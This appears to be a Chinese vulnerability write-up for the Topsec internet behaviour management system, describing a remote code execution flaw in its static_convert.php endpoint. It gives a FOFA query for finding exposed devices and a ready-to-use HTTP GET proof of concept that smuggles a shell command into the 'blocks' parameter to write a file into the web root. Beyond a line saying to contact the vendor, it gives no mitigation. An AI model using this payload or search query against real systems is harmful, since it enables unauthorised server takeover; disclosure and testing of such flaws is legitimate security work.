Nx01 产品简介
天融信上网行为管理系统是天融信公司凭借多年来的安全产品研发经验,为满足各行各业进行网络行为管理和内容审计的专业产品。
Nx02 漏洞描述
天融信上网行为管理系统老版本static_convert.php接口存在RCE漏洞,攻击者利用此漏洞可以获取服务器权限。
Nx03 产品主页
fofa-query: app="天融信-上网行为管理系统"
Nx04 漏洞复现
POC:
GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'pjuxfavsfdulmkj'%20>>%20/var/www/html/uhvokh.txt%0A HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
Nx05 修复建议
建议联系软件厂商进行处理。
